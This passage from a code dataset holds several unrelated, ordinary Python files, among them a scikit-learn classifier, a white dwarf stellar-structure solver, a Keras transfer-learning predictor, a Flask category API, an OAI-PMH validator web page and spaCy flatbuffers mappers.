answer.append(0)\n print(answer)\n","sub_path":"eng.py","file_name":"eng.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624491367","text":"import numpy as np\nfrom sklearn import tree\n\nTRAIN_FILE_NAME = '1505760800_9146957_train_drugs.data'\nTEST_FILE_NAME = '1505760800_9191542_test.data'\nRESULT_FILE_NAME = 'resultpython.txt'\n\n\ndef arrToVect(arr):\n vector = [0] * 100000\n for i in arr:\n vector[int(i) - 1] = 1\n return vector\n\n\ndef createModel(filename):\n X = []\n Y = []\n print(\"Reading Training\")\n with open(filename, 'r') as f:\n data = f.readlines()\n for line in data:\n arr = line.split()\n Y.append(int(arr[0]))\n # X.append(arr)\n X.append(arrToVect(arr[1:]))\n print(\"Building Tree\")\n clf = tree.DecisionTreeClassifier()\n clf = clf.fit(X, Y)\n print(\"Tree Successful\\n\")\n return clf\n\n\ndef testSet(filename):\n print(\"Reading Test Data\\n\")\n tSet = []\n with open(filename, 'r') as f:\n data = f.readlines()\n for line in data:\n arr = line.split()\n tSet.append(arrToVect(arr))\n # tSet = np.array(tSet)\n return tSet\n\n\ndef listToFile(itemList, filename):\n with open(filename, 'w') as f:\n for item in itemList:\n f.write(str(item) + '\\n')\n return\n\n\nclfPredictor = createModel(TRAIN_FILE_NAME)\nanswer = []\ntestSetList = testSet(TEST_FILE_NAME)\noutput = clfPredictor.predict(testSetList)\n\nlistToFile(output, RESULT_FILE_NAME)\n","sub_path":"oldFiles/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157246677","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport os\nimport compactobjects as cobj\nfrom compactobjects import conversion_dict\n\n# useful constants \n\nfrom scipy.constants import speed_of_light, gravitational_constant, pi, hbar, h, m_n, m_e\nimport astropy.constants as const\n\nsolar_mass = const.M_sun.value # kg\n\nC_SI = speed_of_light # m s^-1\nC_CGS = C_SI*100 # cm s^-1\nG_SI = gravitational_constant # m^3 kg^-1 s^-2\nG_CGS = G_SI*1000 # cm^3 g^-1 s^-2\nMSUN_SI = solar_mass # kg\nMSUN_CGS = solar_mass*1000 # g\nHBAR_SI = hbar # J s\nHBAR_CGS = HBAR_SI*1e7 # ergs s\n\n# create the folder where save the results\n\nscript_dir = os.path.dirname(__file__)\nresults_dir = os.path.join(script_dir, 'WDOutput/')\nif not os.path.isdir(results_dir):\n os.makedirs(results_dir)\n\n#####################################\n# MAIN FOR THE POLYTROPIC CASES #\n#####################################\n\n# MAIN FOR THE RELATIVISTIC POLYTROPIC CASE\n\n# Build only a star with a tabulated value of central pressure\n\ngamma = 4/3\ne0 = 7.463e39 * conversion_dict['cgs']['pressure']['geom'] \nk = 1/(e0**(gamma -1))\np0 = e0*1e-14\n\neos = cobj.PressureEdenPolytropic(k, gamma)\n\nwd = cobj.CompactStar(eos)\nwd.set_radii_range(np.linspace(1e-3, 5e7, int(1e6)))\n\nr_newton , m_newton, p_newton = wd.structure_solver('Newton', p0)\nR_newton = r_newton[-1]\nM_newton = m_newton[-1]\n\nr_tov , m_tov, p_tov = wd.structure_solver('TOV', p0)\nR_tov = r_tov[-1]\nM_tov = m_tov[-1]\n\nprint('=========================================================')\nprint('Fermi White Dwarf in the relativistic polytropic case.')\nprint('Central pressure : ', p0*conversion_dict['geom']['pressure']['cgs'], \" dyne/cm^2\")\nprint('---------------------------------------------------------')\nprint(' M_newton = ', M_newton, ' R_newton = ', R_newton,\n '\\n', ' M_tov = ', M_tov, ' R_tov = ', R_tov)\nprint('=========================================================')\n\n# create a figure of m(r) and P(r)\n\nfig,ax = plt.subplots()\nplt.text(0.5, 1.07, \"P(r) & m(r) of a relativistic Fermi gas white dwarf\",\n horizontalalignment='center',\n fontsize=12,\n transform = ax.transAxes)\nax.plot(r_newton, p_newton, color=\"blue\", linestyle=\"-\", linewidth=1, label = 'P Newton')\nax.plot(r_tov, p_tov, color=\"black\", linestyle=\"-\", linewidth=2, label = 'P TOV')\nax.set_xlabel('r [km]',fontsize=14)\nax.set_ylabel(r'P [$dyne/cm^2$]', fontsize=14)\nax.minorticks_on()\n\nax2 = ax.twinx()\nax2.plot(r_newton, m_newton,color=\"blue\", linestyle=\":\", label = 'm Newton')\nax2.plot(r_tov, m_tov, color=\"black\", linestyle=\"-.\", label = 'm TOV')\nax2.plot(R_newton, M_newton, marker = 'o', color='green', label='WD Newton mass')\nax2.plot(R_tov, M_tov, marker = 'o', color='red', label='WD TOV mass')\nax2.set_ylabel(r\"m [$M_{\\odot}$]\",fontsize=14)\nax2.minorticks_on()\n\nfig.legend(loc=\"upper center\", bbox_to_anchor=(0.5,1), bbox_transform=ax.transAxes)\nplt.rcParams[\"savefig.bbox\"] = \"tight\"\nfig.savefig(results_dir+'relwd_mp-vs-r.pdf',\n format='pdf',\n dpi=1000)\n\n# Build a sequence of 500 stars. \n\np0_min = 1e24*conversion_dict['cgs']['pressure']['geom']\np0_max = 2.5e26*conversion_dict['cgs']['pressure']['geom']\npressures = np.linspace(p0_min, p0_max, 500)\n\nR_star_tov, M_star_tov = wd.mass_vs_radius('TOV', pressures)\nR_star_newton, M_star_newton = wd.mass_vs_radius('Newton', pressures)\n\n# plot Mass-Radius\n\nfig,ax = plt.subplots()\nplt.title(\"TOV Mass-Radius of a relativistic Fermi gas WD\")\nax.plot(R_star_tov, M_star_tov, color=\"black\", linestyle=\"-.\", linewidth=2, label = 'TOV')\nax.set_xlabel('R [km]',fontsize=14)\nax.set_ylabel(r\"M [$M_{\\odot}$]\", fontsize=14)\nax.minorticks_on()\n\nfig.legend(loc='upper right')\nplt.rcParams[\"savefig.bbox\"] = \"tight\"\nfig.savefig(results_dir+'relwd_mass-vs-radius.pdf',\n format='pdf',\n dpi=1000)\n\n# plot Mass/Radius - central pressure\n\nfig,ax = plt.subplots()\nplt.title(\"Mass/Radius vs Central Pressure in a relativistic Fermi gas white dwarf\")\nax.set_xscale('log')\nax.minorticks_on()\nax.plot(pressures*conversion_dict['geom']['pressure']['cgs'], M_star_newton, color=\"blue\", linestyle=\"-.\", linewidth=1, label = 'M-Newton')\nax.plot(pressures*conversion_dict['geom']['pressure']['cgs'], M_star_tov, color=\"black\", linestyle=\"-.\", linewidth=2, label = 'M-TOV')\nax.set_xlabel('p0 [$dyne/cm^2$]',fontsize=14)\nax.set_ylabel(r\"M [$M_{\\odot}$]\", fontsize=14)\n\nax2 = ax.twinx()\nax2.set_xscale('log')\nax2.minorticks_on()\nax2.plot(pressures*conversion_dict['geom']['pressure']['cgs'], R_star_newton, color=\"blue\", linestyle=\":\", linewidth=1, label = 'R-Newton')\nax2.plot(pressures*conversion_dict['geom']['pressure']['cgs'], R_star_tov, color=\"black\", linestyle=\":\", linewidth=2, label = 'R-TOV')\nax2.set_ylabel(r\"R [$km$]\",fontsize=14)\n\nfig.legend(loc='center right', bbox_to_anchor=(1,0.5), bbox_transform=ax.transAxes)\nplt.rcParams[\"savefig.bbox\"] = \"tight\"\nfig.savefig(results_dir+'relwd_mr-vs-p0.pdf',\n format='pdf',\n dpi=1000)","sub_path":"tests/FermiGasWD/rel_wd.py","file_name":"rel_wd.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"22259924","text":"#!/usr/bin/python3.6\r\n\r\n\"\"\"\r\nWe will create the most basic form of a nueraon in raw non abstract method\r\nUsing 3 inputs\r\n\"\"\"\r\n\r\n\"\"\"\r\nThese are the value of inputs which are fed to the nueron\r\nAn input can come as an op from another layer or the first layer\r\n\"\"\"\r\ninputs = [1.2, 5.1, 2.1]\r\n\r\n\"\"\"\r\n Every input has a unique weight associated with it. We cannot \r\n tweak the input value but we can change the weights\r\n\"\"\"\r\nweights = [3.1, 2.1, 8.7]\r\n\r\n\"\"\"\r\nBias is just like an intercept added in a linear equation. \r\nIt is an additional parameter in the Neural Network which is used \r\nto adjust the output along with the weighted sum of the inputs to the neuron\r\n\"\"\"\r\nbias = 3.0\r\n\r\n\"\"\"\r\nOutput formula from a single nueron is\r\nop = sum(weights * inputs) + bias\r\ni;e sum(w1*i1 + w2*i2 + w3*i3 .... wn*in) + bias \r\nThis is also called activation function\r\n\"\"\"\r\n\r\noutput = inputs[0]*weights[0] + inputs[1]*weights[1] + inputs[2]*weights[2] + bias\r\nprint(output)\r\n","sub_path":"nnfs/1_codingANueron.py","file_name":"1_codingANueron.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"21072248","text":"#!/usr/bin/env python3\n\nimport os\nimport struct\nimport numpy as np\nimport argparse\n\n\n\ndef load_ndfile(filename):\n with open(filename, 'rb') as f:\n dtype = struct.unpack('8s', f.read(8))[0].decode('utf-8').strip('\\x00')\n rank = struct.unpack('i', f.read(4))[0]\n dims = struct.unpack('i' * rank, f.read(4 * rank))\n data = f.read()\n return np.frombuffer(data, dtype=dtype).reshape(dims)\n\n\n\ndef load_checkpoint(btdir):\n database = dict()\n\n for patch in os.listdir(btdir):\n\n fd = os.path.join(btdir, patch)\n pd = dict()\n\n for field in os.listdir(fd):\n fe = os.path.join(fd, field)\n pd[field] = load_ndfile(fe)\n\n database[patch] = pd\n\n return database\n\n\n\ndef imshow_database(database):\n import matplotlib.pyplot as plt\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 1, 1)\n div1 = make_axes_locatable(ax1)\n cax1 = div1.append_axes('right', size='5%', pad=0.05)\n\n for key, patch in database.items():\n\n R = patch['vert_coords'][:,:,0]\n Q = patch['vert_coords'][:,:,1]\n D = patch['primitive'][:,:,0]\n V = patch['primitive'][:,:,1]\n X = R * np.cos(Q)\n Y = R * np.sin(Q)\n\n im1 = ax1.pcolormesh(Y, X, D, edgecolor='none', lw=0.5)\n fig.colorbar(im1, cax=cax1, orientation='vertical')\n\n ax1.set_title('Log density')\n ax1.set_aspect('equal')\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filenames\", nargs='+')\n args = parser.parse_args()\n\n db = load_checkpoint(args.filenames[0])\n imshow_database(db)\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"187965031","text":"from keras.models import model_from_json\nfrom pathlib import Path\nfrom keras.preprocessing import image\nimport numpy as np\nfrom keras.applications import vgg16\n\n# Load the json file that contains the model's structure\nscript_location = Path(__file__).absolute().parent\nmodel_structure_file = script_location/ \"model_structure.json\"\nmodel_structure = model_structure_file.read_text()\n\n# Recreate the Keras model object from the json data\nmodel = model_from_json(model_structure)\n\n# Re-load the model's trained weights\nmodel.load_weights(\"model_weights.h5\")\n\n# Load an image file to test, resizing it to 64x64 pixels (as required by this model)\nimg_file= script_location/\"dog.png\"\nimg = image.load_img(img_file, target_size=(64, 64))\n\n# Convert the image to a numpy array\nimage_array = image.img_to_array(img)\n\n# Add a forth dimension to the image (since Keras expects a bunch of images, not a single image)\nimages = np.expand_dims(image_array, axis=0)\n\n# Normalize the data\nimages = vgg16.preprocess_input(images)\n\n# Use the pre-trained neural network to extract features from our test image (the same way we did to train the model)\nfeature_extraction_model = vgg16.VGG16(weights='imagenet', include_top=False, input_shape=(64, 64, 3))\nfeatures = feature_extraction_model.predict(images)\n\n# Given the extracted features, make a final prediction using our own model\nresults = model.predict(features)\n\n# Since we are only testing one image with possible class, we only need to check the first result's first element\nsingle_result = results[0][0]\n\n# Print the result\nprint(\"Likelihood that this image contains a dog: {}%\".format(int(single_result * 100)))\n\n###Print image\nimport matplotlib.pyplot as plt\nsample_image = image.load_img(img_file, target_size=(64, 64))\n# Draw the image as a plot\nplt.imshow(sample_image)\n# Show the plot on the screen\nplt.show()","sub_path":"MakingPredictions_TransferLearning_deepLearning.py","file_name":"MakingPredictions_TransferLearning_deepLearning.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"239631110","text":"from flask_restful import Resource, reqparse\n\nfrom model import Category\nfrom util.rest_resp import Resp\nfrom . import api, db, abort_if_obj_null\n\n\n@api.resource(\"/category/\")\nclass CategoryResource(Resource):\n\n def get(self,cid):\n\n entity = Category.query.get(cid)\n\n abort_if_obj_null(entity)\n\n return Resp(data=entity.to_json())\n\n\n def delete(self,cid):\n\n entity = Category.query.get(cid)\n abort_if_obj_null(entity)\n\n try:\n db.session.delete(entity)\n db.session.commit()\n\n return Resp()\n except Exception as ex:\n db.session.rollback()\n\n return Resp(code=400,msg='delete error')\n\n def put(self,cid):\n pass\n\n\ncreate_parse = reqparse.RequestParser()\ncreate_parse.add_argument('name',required=True)\ncreate_parse.add_argument('description',default='')\n\n\n@api.resource(\"/category\")\nclass CategoryListResource(Resource):\n\n def get(self):\n\n entices = Category.query.all()\n data = [e.to_json() for e in entices]\n return Resp(data=data)\n\n def post(self):\n args = create_parse.parse_args()\n\n entity = Category(name=args.get('name'),description=args.get('description'))\n\n try:\n db.session.add(entity)\n db.session.commit()\n return Resp(data=entity.to_json())\n except Exception as ex:\n db.session.rollback()\n\n return Resp(code=400,msg='insert failure')","sub_path":"api/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"226222231","text":"\"\"\"TC ETDMS Validator\nsuper duper ultra basic web page for internal use by non dev\n\"\"\"\nfrom bottle import get, post, request, run\nfrom validate import *\nimport sys, io\n\n@get('/')\ndef home():\n \"\"\"barebone form to ask user for information\"\"\"\n return '''\n
\n OAI url: *required
\n Metadata format:
\n Set:
\n \n
\n '''\n\n\n@post('/')\ndef validate_feed():\n \"\"\"run cli script and print output\"\"\"\n url = request.forms.get('url')\n metadata_format = request.forms.get('metadataformat')\n dataset = request.forms.get('dataset')\n # Hacking stdout, this is how you use a non-library as a library\n # when in a rush\n stdout = sys.stdout\n sys.stdout = io.StringIO()\n\n if (check_url(url)\n and check_identify(url)\n and check_metadata_formats(url, metadata_format)\n and check_these(url, metadata_format, dataset)):\n print(\"Validation completed successfuly, metadata can be harvested\")\n\n output = sys.stdout.getvalue()\n sys.stdout = stdout\n return output.replace('<', '[').replace('>', ']').replace('\\n', '
')\n\n\nrun(host='localhost', port=8080, debug=True, server='gunicorn')","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"274399800","text":"\"\"\"\n 练习2:定义函数,判断二维列表是否存在某个数字\n 输入:二维列表,2\n 输出:TRUE\n\"\"\"\nmap = [ [2, 2, 0, 4],\n [0, 4, 8, 8 ],\n [2, 2, 2, 2 ],\n [0, 2, 2, 0]]\ndef judge_exist(list,number):\n for i in list:\n if number in i:\n return \"true\"\n return \"false\"\nprint(judge_exist(map,5))\n","sub_path":"month01/day09/day08/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"257844564","text":"from dataclasses import dataclass\nfrom enum import Enum\nfrom typing import List, Any\n\nfrom flatbuffers import Builder\nfrom keios_protocol_spacy.flatbuffers import DEPSpacyResponse as DEPSpacyResponseClass\nfrom keios_protocol_spacy.flatbuffers import NERSpacyResponse as NERSpacyResponseClass\nfrom keios_protocol_spacy.flatbuffers import SpacyBatchRequest as SpacyBatchRequestClass\nfrom keios_protocol_spacy.flatbuffers import SpacyBatchResponse as SpacyBatchResponseClass\nfrom keios_protocol_spacy.flatbuffers import SpacyMessage as SpacyMessageClass\nfrom keios_protocol_spacy.flatbuffers import SpacyMessageType\nfrom keios_protocol_spacy.flatbuffers import SpacyRequest as SpacyRequestClass\nfrom keios_protocol_spacy.flatbuffers import SpacyResponse as SpacyResponseClass\nfrom keios_protocol_spacy.flatbuffers.SpacyBatchRequest import SpacyBatchRequest, SpacyBatchRequestStartRequestsVector, \\\n SpacyBatchRequestAddRequests, SpacyBatchRequestEnd\nfrom keios_protocol_spacy.flatbuffers.SpacyBatchResponse import SpacyBatchResponse\nfrom keios_protocol_spacy.flatbuffers.SpacyRequest import SpacyRequest, SpacyRequestStartTypeVector, \\\n SpacyRequestAddType, SpacyRequestEnd, SpacyRequestStart\nfrom keios_protocol_spacy.flatbuffers.SpacyResponse import SpacyResponse, SpacyResponseStartDepVector, \\\n SpacyResponseAddDep, SpacyResponseEnd, SpacyResponseStart, SpacyResponseStartNerVector, SpacyResponseAddNer\nfrom keios_protocol_spacy.flatbuffers.Type import Type\n\n\n@dataclass\nclass SpacyMessageData:\n type: SpacyMessageType\n message: object\n\n\nclass SpacyMessageMapper:\n @staticmethod\n def serialize(entity: SpacyMessageData) -> bytearray:\n builder = Builder(128)\n\n payload_offset = None\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyResponse:\n payload_offset = SpacyResponseMapper.serialize(entity.message, builder)\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyRequest:\n payload_offset = SpacyRequestMapper.serialize(entity.message, builder)\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyBatchRequest:\n payload_offset = SpacyBatchRequestMapper.serialize(entity.message, builder)\n\n if entity.type == SpacyMessageType.SpacyMessageType().SpacyBatchResponse:\n payload_offset = SpacyBatchResponseMapper.serialize(entity.message, builder)\n\n SpacyMessageClass.SpacyMessageStart(builder)\n SpacyMessageClass.SpacyMessageAddMessageType(builder, entity.type)\n SpacyMessageClass.SpacyMessageAddMessage(builder, payload_offset)\n message_offset = SpacyMessageClass.SpacyMessageEnd(builder)\n builder.Finish(message_offset)\n\n return builder.Output()\n\n @staticmethod\n def deserialize(bb: bytearray) -> SpacyMessageData:\n message = SpacyMessageClass.SpacyMessage.GetRootAsSpacyMessage(bb, 0)\n wrapped = message.Message()\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyResponse:\n fb_obj = SpacyResponse()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyResponseMapper.to_dataclass(fb_obj))\n\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyRequest:\n fb_obj = SpacyRequest()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyRequestMapper.to_dataclass(fb_obj))\n\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyBatchRequest:\n fb_obj = SpacyBatchRequest()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyBatchRequestMapper.to_dataclass(fb_obj))\n\n if message.MessageType() == SpacyMessageType.SpacyMessageType().SpacyBatchResponse:\n fb_obj = SpacyBatchResponse()\n fb_obj.Init(wrapped.Bytes, wrapped.Pos)\n return SpacyMessageData(message.MessageType(), SpacyBatchResponseMapper.to_dataclass(fb_obj))\n\n raise ValueError(\"unknown type\")\n\n\n@dataclass\nclass DEPSpacyResponseData:\n lang: str\n relation: str\n source: str\n source_pos: str\n source_index: int\n source_tag: str\n source_base: str\n target: str\n target_pos: str\n target_index: int\n target_tag: str\n target_base: str\n\n\nclass DEPSpacyResponseMapper:\n @staticmethod\n def serialize(entity: DEPSpacyResponseData, builder: Builder) -> Any:\n lang_offset_offset = builder.CreateString(entity.lang)\n relation_offset = builder.CreateString(entity.relation)\n source_offset = builder.CreateString(entity.source)\n source_pos_offset = builder.CreateString(entity.source_pos)\n source_tag_offset = builder.CreateString(entity.source_tag)\n source_base_offset = builder.CreateString(entity.source_base)\n target_offset = builder.CreateString(entity.target)\n target_pos_offset = builder.CreateString(entity.target_pos)\n target_tag_offset = builder.CreateString(entity.target_tag)\n target_base_offset = builder.CreateString(entity.target_base)\n\n DEPSpacyResponseClass.DEPSpacyResponseStart(builder)\n DEPSpacyResponseClass.DEPSpacyResponseAddLang(builder, lang_offset_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddRelation(builder, relation_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSource(builder, source_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourcePos(builder, source_pos_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourceIndex(builder, entity.source_index)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourceTag(builder, source_tag_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourceBase(builder, source_base_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTarget(builder, target_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetPos(builder, target_pos_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetIndex(builder, entity.target_index)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetTag(builder, target_tag_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetBase(builder, target_base_offset)\n\n return DEPSpacyResponseClass.DEPSpacyResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: DEPSpacyResponseClass.DEPSpacyResponse) -> DEPSpacyResponseData:\n return DEPSpacyResponseData(\n flatbuffer_object.Lang().decode(\"UTF-8\"),\n flatbuffer_object.Relation().decode(\"UTF-8\"),\n flatbuffer_object.Source().decode(\"UTF-8\"),\n flatbuffer_object.SourcePos().decode(\"UTF-8\"),\n flatbuffer_object.SourceIndex(),\n flatbuffer_object.SourceTag().decode(\"UTF-8\"),\n flatbuffer_object.SourceBase().decode(\"UTF-8\"),\n flatbuffer_object.Target().decode(\"UTF-8\"),\n flatbuffer_object.TargetPos().decode(\"UTF-8\"),\n flatbuffer_object.TargetIndex(),\n flatbuffer_object.TargetTag().decode(\"UTF-8\"),\n flatbuffer_object.TargetBase().decode(\"UTF-8\")\n )\n\n\n@dataclass\nclass NERSpacyResponseData:\n text: str\n start_char: int\n end_char: int\n label: str\n\n\nclass NERSpacyResponseMapper:\n @staticmethod\n def serialize(entity: NERSpacyResponseData, builder: Builder) -> Any:\n text_offset = builder.CreateString(entity.text)\n label_offset = builder.CreateString(entity.label)\n\n NERSpacyResponseClass.NERSpacyResponseStart(builder)\n NERSpacyResponseClass.NERSpacyResponseAddText(builder, text_offset)\n NERSpacyResponseClass.NERSpacyResponseAddStartChar(builder, entity.start_char)\n NERSpacyResponseClass.NERSpacyResponseAddEndChar(builder, entity.end_char)\n NERSpacyResponseClass.NERSpacyResponseAddLabel(builder, label_offset)\n\n return NERSpacyResponseClass.NERSpacyResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: NERSpacyResponseClass.NERSpacyResponse) -> NERSpacyResponseData:\n return NERSpacyResponseData(flatbuffer_object.Text().decode(\"UTF-8\"), flatbuffer_object.StartChar(),\n flatbuffer_object.EndChar(), flatbuffer_object.Label().decode(\"UTF-8\"))\n\n\nclass TypeData(Enum):\n DEP = 0\n NER = 1\n\n @staticmethod\n def from_value(value: int):\n for t in TypeData:\n if t.value == value:\n return t\n raise ValueError(f\"unknown value {value}\")\n\n\n@dataclass\nclass SpacyRequestData:\n text: str\n types: List[TypeData]\n\n\nclass SpacyRequestMapper:\n @staticmethod\n def serialize(entity: SpacyRequestData, builder: Builder) -> Any:\n text_offset = builder.CreateString(entity.text)\n SpacyRequestClass.SpacyRequestStartTypeVector(builder, len(entity.types))\n for x in reversed(entity.types):\n builder.PrependByte(x.value)\n types_offset = builder.EndVector(len(entity.types))\n\n SpacyRequestClass.SpacyRequestStart(builder)\n SpacyRequestClass.SpacyRequestAddText(builder, text_offset)\n SpacyRequestClass.SpacyRequestAddType(builder, types_offset)\n\n return SpacyRequestClass.SpacyRequestEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyRequestClass.SpacyRequest) -> SpacyRequestData:\n types = list(map(lambda x: TypeData.from_value(x),\n map(lambda i: flatbuffer_object.Type(i), range(0, flatbuffer_object.TypeLength()))))\n return SpacyRequestData(flatbuffer_object.Text().decode(\"UTF-8\"), types)\n\n\n@dataclass\nclass SpacyBatchRequestData:\n requests: List[SpacyRequestData]\n\n\nclass SpacyBatchRequestMapper:\n @staticmethod\n def serialize(entity: SpacyBatchRequestData, builder: Builder) -> Any:\n requests_offsets = list(map(lambda r: SpacyRequestMapper.serialize(r, builder), entity.requests))\n SpacyBatchRequestClass.SpacyBatchRequestStartRequestsVector(builder, len(entity.requests))\n for offset in reversed(requests_offsets):\n builder.PrependUOffsetTRelative(offset)\n requests_vector_offset = builder.EndVector(len(entity.requests))\n SpacyBatchRequestClass.SpacyBatchRequestStart(builder)\n SpacyBatchRequestClass.SpacyBatchRequestAddRequests(builder, requests_vector_offset)\n\n return SpacyBatchRequestClass.SpacyBatchRequestEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyBatchRequestClass.SpacyBatchRequest) -> SpacyBatchRequestData:\n requests = list(map(lambda r: SpacyRequestMapper.to_dataclass(r),\n map(lambda i: flatbuffer_object.Requests(i), range(0, flatbuffer_object.RequestsLength()))))\n return SpacyBatchRequestData(requests)\n\n\n@dataclass\nclass SpacyResponseData:\n ner: List[NERSpacyResponseData]\n dep: List[DEPSpacyResponseData]\n\n\nclass SpacyResponseMapper:\n @staticmethod\n def serialize(entity: SpacyResponseData, builder: Builder) -> Any:\n ner_offsets = list(map(lambda n: NERSpacyResponseMapper.serialize(n, builder), entity.ner))\n dep_offsets = list(map(lambda d: DEPSpacyResponseMapper.serialize(d, builder), entity.dep))\n SpacyResponseClass.SpacyResponseStartNerVector(builder, len(entity.ner))\n for x in reversed(ner_offsets):\n builder.PrependUOffsetTRelative(x)\n ner_vector_offset = builder.EndVector(len(entity.ner))\n\n SpacyResponseClass.SpacyResponseStartDepVector(builder, len(entity.dep))\n for x in reversed(dep_offsets):\n builder.PrependUOffsetTRelative(x)\n dep_vector_offset = builder.EndVector(len(entity.dep))\n\n SpacyResponseClass.SpacyResponseStart(builder)\n SpacyResponseClass.SpacyResponseAddNer(builder, ner_vector_offset)\n SpacyResponseClass.SpacyResponseAddDep(builder, dep_vector_offset)\n return SpacyResponseClass.SpacyResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyResponseClass.SpacyResponse) -> SpacyResponseData:\n ner = list(map(lambda n: NERSpacyResponseMapper.to_dataclass(n),\n map(lambda i: flatbuffer_object.Ner(i), range(0, flatbuffer_object.NerLength()))))\n\n dep = list(map(lambda d: DEPSpacyResponseMapper.to_dataclass(d),\n map(lambda i: flatbuffer_object.Dep(i), range(0, flatbuffer_object.DepLength()))))\n return SpacyResponseData(ner, dep)\n\n\n@dataclass\nclass SpacyBatchResponseData:\n responses: List[SpacyResponseData]\n\n\nclass SpacyBatchResponseMapper:\n @staticmethod\n def serialize(entity: SpacyBatchResponseData, builder: Builder) -> Any:\n responses_offsets = list(map(lambda r: SpacyResponseMapper.serialize(r, builder), entity.responses))\n SpacyBatchResponseClass.SpacyBatchResponseStartResponsesVector(builder, len(entity.responses))\n for offset in reversed(responses_offsets):\n builder.PrependUOffsetTRelative(offset)\n responses_vector_offset = builder.EndVector(len(entity.responses))\n\n SpacyBatchResponseClass.SpacyBatchResponseStart(builder)\n SpacyBatchResponseClass.SpacyBatchResponseAddResponses(builder, responses_vector_offset)\n return SpacyBatchResponseClass.SpacyBatchResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyBatchResponseClass.SpacyBatchResponse) -> SpacyBatchResponseData:\n responses = list(map(lambda x: SpacyResponseMapper.to_dataclass(x),\n map(lambda i: flatbuffer_object.Responses(i),\n range(0, flatbuffer_object.ResponsesLength()))))\n return SpacyBatchResponseData(responses)\n","sub_path":"python/keios-protocol-spacy/keios_protocol_spacy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530090339","text":"import datetime\nimport pytz\n\nclass multilist():\n \t#Reflects flag status lists\n \tlists = {\n \t\"none\" : [],\n \t\"ready\" : [],\n \t\"queue\" : [],\n \t\"valid\" : [],\n \t\"invalid\" : []\n \t}\n\n \tdef __init__(self, nonay, reaay, queay, valay, invay):\n \t\tself.lists[\"none\"] = nonay\n \t\tself.lists[\"ready\"] = reaay\n \t\tself.lists[\"queue\"] = queay\n \t\tself.lists[\"valid\"] = valay\n \t\tself.lists[\"invalid\"] = invay\n\nd = datetime.datetime(1998, 8, 12, 12, 32, 41)\ntimezone = pytz.timezone(\"America/Chicago\")\nd_aware = timezone.localize(d)\n\nnonay = [\n\t(\"mvol/0004/1905/0130\", d_aware),\n\t(\"mvol/0004/1905/0404\", d_aware),\n\t(\"mvol/0004/1920/1111\", d_aware),\n\t(\"mvol/0004/1930/0812\", d_aware),\n]\n\nreaay = [\n\t(\"mvol/0004/1905/0214\", d_aware),\n\t(\"mvol/0004/1930/0311\", d_aware),\n\t(\"mvol/0004/1930/1001\", d_aware),\n]\n\nqueay = [\n\t(\"mvol/0004/1905/0917\", d_aware),\n\t(\"mvol/0004/1930/0712\", d_aware),\n]\n\nvalay = [\n\t(\"mvol/0004/1920/1202\", d_aware)\n]\n\ninvay = [\n\t(\"mvol/0004/1920/0624\", d_aware)\n]\n\nyex = 0\n\nfor i in range (0, yex):\n\tnonay.append(((\"mvol/0004/1921/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range 